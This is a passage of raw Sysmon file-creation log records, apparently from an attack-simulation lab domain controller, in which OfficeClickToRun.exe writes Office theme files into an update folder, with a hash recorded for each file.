AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\PREVIEW.GIFMD5=0E8DA8EDAE774D5B23AE6EB233BAC5F6,SHA256=C37E60F183F6E4533C30D56B1611B2CBABEF9F54A2938618F4A377ECB20CB526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\CONCRETE.INFMD5=59C525ED8549C24114DFB79D73152CF3,SHA256=2F88876C268AD179B93FCF9F5CFB05FFEAFEBEB665512F1C91442D4B11C5D9A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\CONCRETE.ELMMD5=547EE88653E609D73010A0FF38355624,SHA256=93F05B75AF843D2305CB9E08723AE95E1DD5171BD8EA9986E9A5E805BC56A3A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\THMBNAIL.PNGMD5=42F3D266482F6E08F68A1F7DF8B47ACC,SHA256=AED1A75377CAE77535D62314EC276045AF7A223939B8F1859576EC5729A1F534,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\PREVIEW.GIFMD5=7B7307A7452A170C192C9DA9B7762B3B,SHA256=38DDB0414DB9409362BF8A42AFA418195272C4A0D4DF0CE4F438AAA755D3F667,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.INFMD5=669443036E68DD4038FF7611A515E697,SHA256=6CE49CB71B6E249B1B435DFC4DF0056EFEA45EA571D8C10BBC426409167FBF8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.ELMMD5=88CEB5DA047A1BEBE5F624FA92FBA368,SHA256=CB211293C7C75844BF8CEDAE5C1BD229FC3CC115315A8ADD9385FB043656B042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\THMBNAIL.PNGMD5=CDC4CCF13DA5F76298BC5793AD29FFF6,SHA256=EDBB9512B16C3FB14D9F705C51926083A8B4ED5F5CD4CD323CDA1C5DE7B84D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\PREVIEW.GIFMD5=2BF28053F0AB8E3E40B52ED59FA40FF7,SHA256=D9B1CA0A0F8D068DA8B588C1C57E1DF718816BB2EC1F39F36F7404C69B7C21DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\CASCADE.INFMD5=478F7CFFCA0B36FE454B7BF37FDD2CA8,SHA256=13B8EEBC065E04B462D8302524E7AE47DCE1E85D15F0F5253D147A6E07FEDD1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\CASCADE.ELMMD5=88B58AD7EEFD40C5A46729268CE01EC6,SHA256=70A1C09CCEE6E0E8675574AD25DB9E521F23B8D06601E23C37F622CA88DB6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\THMBNAIL.PNGMD5=A6F8E5E4972A965094FFB029BB3526C5,SHA256=5154BBE8F87DC6DE02524E8A6D466117F3D4B624FC38DF6B72D70D9A26EFA4F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\PREVIEW.GIFMD5=1DD89832D57F4A3486C1F23608FDE67B,SHA256=BBAFEB3EC93B76217EC0417CC29C435AA54E879EB0442CB670D847F9A01C74B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\CAPSULES.INFMD5=F41285E34DA7DC75759C38B385158A47,SHA256=15312FFA9F3F364E02EA9F55D4B9849F5D832784A7A86D20FCCED449560BB6B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CAPSULES\CAPSULES.ELMMD5=9F3053884FC5D2623DA6D3448B2D3C49,SHA256=E6A78DC3BE9DDC8E653AC96175956334D265A4C281A949D897621D93CB51857C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\THMBNAIL.PNGMD5=9626B6D0A0AC9DE5970E0538CF24557B,SHA256=4EADF94EAECC6DCF834D954BB5740EC0B43D506DCAB13B979EE48F86ECE04F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\PREVIEW.GIFMD5=97E00AD3565127BBFB1F60ACC06DA925,SHA256=DBFFA7B8A3F3F82FFC6AD56FB3686448DD61ACC5B370664953B775A38C8FF01C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INFMD5=AFB0B39FA6C2C2D1FFAE2519C7C3C116,SHA256=51629425DBAC1924BB8FC555BCB80E7FB4A69290936D157509677BACCEE2BFEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.ELMMD5=3BD8A226A6CC5D50FCFC6B5958B75FAC,SHA256=248C1A5C52E45D8F9B62A1D9FFE59ED43D94EFAD2650E42216062DE1EBAB979B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\THMBNAIL.PNGMD5=5CBE6EB80A21280E29CA963B93DE65AF,SHA256=E2EE2041CFD06582E36758F289840E9334D0E4B2612796138CCA45B9D43FDA8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\PREVIEW.GIFMD5=8CC0B1A7BD2D7DE3F1029A2E034C8D1E,SHA256=1D804C8EE46B7995BD2865EC2B8545A938F5FDF3E8BAA1BE977E9ED74A37DDC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\BREEZE.INFMD5=09D030A74DB9AF87FE5272AB8F11C48E,SHA256=3CD3D8690D97F445EC5320D4231D91BA447FC21A41E078DB2DA34CD3FBCC0118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BREEZE\BREEZE.ELMMD5=207AC7E00D13860BA9F3CDB94D5D4D8B,SHA256=62ACEFBA58FF54382B039993942DE7A142F8F22D8F15BA84E8C8D5E98C8C1EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\THMBNAIL.PNGMD5=E47A414B3AA4A200835278F62F41247B,SHA256=EB1D06F3F5EBA74C1F779038DFAE8E1F53A8D87BC7964F16405572FE3B239318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\PREVIEW.GIFMD5=95DD8E42CB979586A685EAEF5BCA33FC,SHA256=EEBDC56C340E1A52EC8F48E87CFEC83F7108961B0512FAB163310A889346CDE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\BOLDSTRI.INFMD5=DFE800ACE985461F21FE12DCAC879127,SHA256=9E3FB6F41F0BB4A12F3C7FAAC65DDEEB6CCEF7CFD2B58F446269C3A3EF783100,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BOLDSTRI\BOLDSTRI.ELMMD5=B4B18174F72E10B4F5E26764AA7CB4A6,SHA256=57B4F7733D59CCBB5EC17D42EB55B4B90918DF2AC7DD4516AEF981A2C92C1C98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\THMBNAIL.PNGMD5=1AF6126D451EDC8CC8CF454A565423D3,SHA256=1122DA53BFE83AFCFB5748AE288B0B4ED78314FD6B837794611A65AA93B2C6D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\PREVIEW.GIFMD5=2A3DD7520BF90775598104C0890471F0,SHA256=95BA0215FD2B02EA7D6E8F4909B545A7A9B5B5A8AB6721E7229856C6891B008E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\BLUEPRNT.INFMD5=51F3CD325073E034F23E54A2D8D2E4F3,SHA256=8481AECABFD5E830EAC908592168F12FFAB9C05EFBE76F1C7EBB3C5A82A86E74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\BLUEPRNT.ELMMD5=B7D5E85F7F969D207BB8C3A2F44B41CE,SHA256=6C90D8972682907679D4A0FF04AD9058DEE6B0A83F3FBD15902EBEC516580311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\THMBNAIL.PNGMD5=3B7A7929BE3C3133569924972EBA64B6,SHA256=A509EA8D2AB06455C12E19402A9FA9BAD4A7425FC11316450183B0EE97BC18BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\PREVIEW.GIFMD5=401569F3DF8E4B103EF9EB7F8A4AA971,SHA256=C2106BA8DF447C7966ED8A8C553342A4879F365DE9C11B4C9BC9A4C407F12813,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.INFMD5=BCD550D7AE23CD6079AD2D31273648C5,SHA256=9922B9FDAFF6FF88AA150DD0201E3FEB5F23401C303200B5A2E2E397C9CBDA41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUECALM\BLUECALM.ELMMD5=B74D2D738225022B8FFD827DF40E25AF,SHA256=39C6A6AE938ACD0E61D17901079D71AAAEA22E15FFA11209F85A0BF6E1E5ECAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\THMBNAIL.PNGMD5=E436AFBA8080B841A395191CF72CEE35,SHA256=5EBA0DB294948F58DA974C71E08DA1B51F7764EB82777D0039E4FF856A8F91AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\PREVIEW.GIFMD5=C2897277FB83B5CD70F54D0880B9BF43,SHA256=47870B3D3F8147FAA0BBF8ACFCDF09D5ADBF470729BC9A1A5D8762635D47D268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.INFMD5=B6743B451D2D88CE1DBBB8F9222C24A9,SHA256=9CD8735F5F6527A976BA47895E3F795C2E07AAA02FFA942FCE0EF51417506978,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.ELMMD5=EBC2C59F4E5B87EDC47838D1D220E7A0,SHA256=98683085184D70DF27CB609E23C9280682EDB8DAF84DED7E0169807FA968E6DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.360{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\THMBNAIL.PNGMD5=21CC8BEC7088E94DB85BB0FCDB9ED1E6,SHA256=B24F013BBA9E34003C0BC0B0FFFC446F42AA412072DD423E3F9EE71DCEFDB67E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AXIS\PREVIEW.GIFMD5=4BFB1AC5298CCE233F03FB9C43C3727F,SHA256=47526CD485FF24135F2452CB81F70F7D038AE4C016BF8087C288091B5D1529D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 